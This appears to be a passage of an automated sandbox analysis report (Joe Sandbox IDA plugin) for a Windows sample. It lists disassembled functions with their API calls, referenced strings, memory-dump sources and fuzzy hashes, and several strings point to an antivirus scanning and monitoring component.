Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700

Function 0000000140009C30 Relevance: 16.6, APIs: 11, Instructions: 150COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
String ID:
API String ID: 1232609184-0
Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300

Function 0000000140002740 Relevance: 16.6, APIs: 10, Strings: 1, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001AA6
Part of subcall function 0000000140001A30: LeaveCriticalSection.KERNEL32 ref: 0000000140001B30
Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001B48
Part of subcall function 0000000140001A30: LeaveCriticalSection.KERNEL32 ref: 0000000140001BC9
Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001BE6

EnterCriticalSection.KERNEL32 ref: 00000001400027B2
LeaveCriticalSection.KERNEL32 ref: 000000014000286E
GetProcessHeap.KERNEL32 ref: 000000014000287F
HeapFree.KERNEL32 ref: 000000014000288D
GetProcessHeap.KERNEL32 ref: 000000014000289D
HeapFree.KERNEL32 ref: 00000001400028AB
GetProcessHeap.KERNEL32 ref: 00000001400028BB
HeapFree.KERNEL32 ref: 00000001400028C9
GetProcessHeap.KERNEL32 ref: 00000001400028D9
HeapFree.KERNEL32 ref: 00000001400028E7

Strings

H, xrefs: 000000014000278C

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: Heap$CriticalSection$EnterFreeProcess$Leave
String ID: H
API String ID: 2107338056-2852464175
Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300

Function 0000000140003200 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 100timeCOMMON

Download Yara Rule

APIs

#4.VSELOG ref: 0000000140003242
EnterCriticalSection.KERNEL32 ref: 0000000140003257
LeaveCriticalSection.KERNEL32 ref: 00000001400032D9
#4.VSELOG ref: 0000000140003353

Part of subcall function 0000000140002B40: LoadLibraryW.KERNEL32 ref: 0000000140002B91
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BAD
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BC8
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BE3
Part of subcall function 0000000140002B40: EnterCriticalSection.KERNEL32 ref: 0000000140002C0D
Part of subcall function 0000000140002B40: LeaveCriticalSection.KERNEL32 ref: 0000000140002C9A
Part of subcall function 0000000140002B40: EnterCriticalSection.KERNEL32 ref: 0000000140002CAF
Part of subcall function 0000000140002B40: LeaveCriticalSection.KERNEL32 ref: 0000000140002D2D

#4.VSELOG ref: 0000000140003389
SetWaitableTimer.KERNEL32 ref: 00000001400033BE

Strings

fnCallback: hScan=%d, quarantine, result %d, xrefs: 000000014000333F
fnCallback: hScan=%d, putting event %d into listening threads queues, xrefs: 0000000140003372
fnCallback: hScan=%d, evId=%d, context=%p, xrefs: 000000014000323B

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
API String ID: 1322048431-2685357988
Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740

Function 0000000140003D50 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75timeCOMMON

Download Yara Rule

APIs

#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003D84
EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003DA3
#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E19
LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E25
#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E66
SetWaitableTimer.KERNEL32 ref: 0000000140003EA6

Strings

doCleanup: pid %d, removing cAmpEntry, index is %d, xrefs: 0000000140003E08
doCleanup: pid %d, marking the cAmpEntry pointer for deletion, xrefs: 0000000140003E58
doCleanup: enter, cAmpEntry %p, xrefs: 0000000140003D76

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: CriticalSection$EnterLeaveTimerWaitable
String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
API String ID: 2984211723-3002863673
Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710

Function 00000001400021A0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

#4.VSELOG ref: 00000001400021D4
OpenProcess.KERNEL32 ref: 00000001400021F7
#4.VSELOG ref: 000000014000223A
WaitForMultipleObjects.KERNEL32 ref: 000000014000224F
CloseHandle.KERNEL32 ref: 000000014000225A
#4.VSELOG ref: 0000000140002294

Strings

fnMonitor: monitor thread for ctx %p, xrefs: 00000001400021C6
doMonitor: monitoring process id=%d, xrefs: 000000014000222C
doMonitor: end process id=%d, result from WaitForMultipleObjects=%d, xrefs: 0000000140002283

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: CloseHandleMultipleObjectsOpenProcessWait
String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
API String ID: 678758403-4129911376
Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710

Function 0000000140001750 Relevance: 15.1, APIs: 12, Instructions: 133memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 0000000140001797
GetProcessHeap.KERNEL32 ref: 00000001400017A6
HeapAlloc.KERNEL32 ref: 00000001400017B4
lstrlenW.KERNEL32 ref: 00000001400017EC
GetProcessHeap.KERNEL32 ref: 00000001400017FB
HeapAlloc.KERNEL32 ref: 0000000140001809
lstrlenW.KERNEL32 ref: 000000014000183F
GetProcessHeap.KERNEL32 ref: 000000014000184E
HeapAlloc.KERNEL32 ref: 000000014000185C
lstrlenW.KERNEL32 ref: 000000014000188D
GetProcessHeap.KERNEL32 ref: 000000014000189C
HeapAlloc.KERNEL32 ref: 00000001400018AA

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen
String ID:
API String ID: 3424473247-0
Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700

Function 0000000140012C70 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 415COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000000140011270: RtlLookupFunctionEntry.KERNEL32 ref: 00000001400112F1

__GetUnwindTryBlock.LIBCMT ref: 0000000140012CDD
__SetUnwindTryBlock.LIBCMT ref: 0000000140012D05
__GetUnwindTryBlock.LIBCMT ref: 0000000140012D15
_SetThrowImageBase.LIBCMT ref: 0000000140012DA6

Strings

csm, xrefs: 0000000140012E97
csm, xrefs: 0000000140012DC1
bad exception, xrefs: 0000000140012E4A
csm, xrefs: 0000000140012D2F

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
String ID: bad exception$csm$csm$csm
API String ID: 3766904988-820278400
Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700

Function 0000000140004750 Relevance: 13.6, APIs: 9, Instructions: 80sleepCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140004A0F
LeaveCriticalSection.KERNEL32 ref: 0000000140004A1D
WaitForMultipleObjects.KERNEL32 ref: 0000000140004A44
Sleep.KERNEL32 ref: 0000000140004A75
EnterCriticalSection.KERNEL32 ref: 0000000140004A7F
SetEvent.KERNEL32 ref: 0000000140004AC5
ResetEvent.KERNEL32 ref: 0000000140004ACF
LeaveCriticalSection.KERNEL32 ref: 0000000140004AD9
WaitForMultipleObjects.KERNEL32 ref: 0000000140004B0D

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
String ID:
API String ID: 2707001247-0
Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708

Function 00007FFDA5804804 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FFDA5804861

Part of subcall function 00007FFDA5806BC4: __GetUnwindTryBlock.LIBCMT ref: 00007FFDA5806C07
Part of subcall function 00007FFDA5806BC4: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FFDA5806C2C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFDA5804939
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FFDA5804B87
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDA5804C94

Strings

csm, xrefs: 00007FFDA580487B
csm, xrefs: 00007FFDA580495C
csm, xrefs: 00007FFDA58048E2

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
Instruction ID: 7c1df3a0dcb362c68ddf5089fb43d0b1cd7a76e8c0484346af7174e4e129ebd2
Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
Instruction Fuzzy Hash: E8D17F22B097498AEB209B7594603AD77A0FF56F98F100275EE8D57BA6CF38E581C704

Function 0000000140001690 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000000014000169E
HeapFree.KERNEL32 ref: 00000001400016B0
GetProcessHeap.KERNEL32 ref: 00000001400016C0
HeapFree.KERNEL32 ref: 00000001400016D2
GetProcessHeap.KERNEL32 ref: 00000001400016E2
HeapFree.KERNEL32 ref: 00000001400016F4
GetProcessHeap.KERNEL32 ref: 0000000140001704
HeapFree.KERNEL32 ref: 0000000140001716
GetProcessHeap.KERNEL32 ref: 0000000140001726
HeapFree.KERNEL32 ref: 0000000140001738

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601

Function 0000000140013710 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000000014001371E
HeapFree.KERNEL32 ref: 0000000140013730
GetProcessHeap.KERNEL32 ref: 0000000140013740
HeapFree.KERNEL32 ref: 0000000140013752
GetProcessHeap.KERNEL32 ref: 0000000140013762
HeapFree.KERNEL32 ref: 0000000140013774
GetProcessHeap.KERNEL32 ref: 0000000140013784
HeapFree.KERNEL32 ref: 0000000140013796
GetProcessHeap.KERNEL32 ref: 00000001400137A6
HeapFree.KERNEL32 ref: 00000001400137B8

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601

Function 00007FFDA580B86C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 00007FFDA580B9E8
GetProcAddress.KERNEL32 ref: 00007FFDA580B9F4

Strings

api-ms-, xrefs: 00007FFDA580B932
ext-ms-, xrefs: 00007FFDA580B945

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
Instruction ID: 081debef2622172ccf7f302983589d2187042ea445c2556ce8c76394e5287faf
Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
Instruction Fuzzy Hash: 1041E421B1BA1A41EA16CB36A8307BE2391BF07F90F584675DD0E4779AEF3CE4458308

Function 0000000140002A00 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32 ref: 0000000140002A3C
RegQueryValueExW.ADVAPI32 ref: 0000000140002A76
RegCloseKey.ADVAPI32 ref: 0000000140002A96
EnterCriticalSection.KERNEL32 ref: 0000000140002AAB
LeaveCriticalSection.KERNEL32 ref: 0000000140002B31

Strings

SYSTEM\CurrentControlSet\Services\vseamps\Parameters, xrefs: 0000000140002A0D
action, xrefs: 0000000140002A52

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
API String ID: 1119674940-1966266597
Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00

Function 0000000140001900 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 56memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004BE7
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004BF6
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004C04
Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004C3E
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004C4D
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004C5B
Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004C8E
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004C9D
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004CAB

GetComputerNameW.KERNEL32 ref: 0000000140001991
lstrlenW.KERNEL32 ref: 000000014000199C
GetProcessHeap.KERNEL32 ref: 00000001400019AB
HeapAlloc.KERNEL32 ref: 00000001400019B9

Strings

ncalrpc, xrefs: 000000014000196D
ampIfEp, xrefs: 000000014000195E
Security=impersonation static true, xrefs: 0000000140001952

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen$ComputerName
String ID: Security=impersonation static true$ampIfEp$ncalrpc
API String ID: 3702919091-996641649
Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00

Function 000000014000F3E0 Relevance: 10.7, APIs: 7, Instructions: 179COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E

Memory Dump Source

